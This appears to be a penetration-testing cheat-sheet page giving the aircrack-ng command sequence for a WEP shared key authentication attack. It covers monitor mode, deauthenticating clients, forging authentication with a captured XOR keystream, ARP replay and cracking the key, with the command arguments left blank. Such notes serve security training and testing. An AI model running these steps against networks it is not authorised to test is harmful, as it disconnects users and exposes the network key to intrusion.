wep_shared_key_authentication_attack
WEP SHARED KEY AUTHENTICATION ATTACK
WEP shared Key Authentication Attack
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:
airodump-ng -c --bssid -w
Deauthenticate the connected client to capture the PRGA XOR keystream:
aireplay-ng -0 1 -a -c
Conduct a fake shared key authentication using the XOR keystream:
aireplay-ng -1 0 -e -y -a -h
Launch the ARP request replay attack:
aireplay-ng -3 -b -h
Deauthenticate the victim client again to force the generation of an ARP packet:
aireplay-ng -0 1 -a -c
Once IVs are being generated by the AP, run Aircrack-ng against the capture:
aircrack-ng
Last updated
Was this helpful?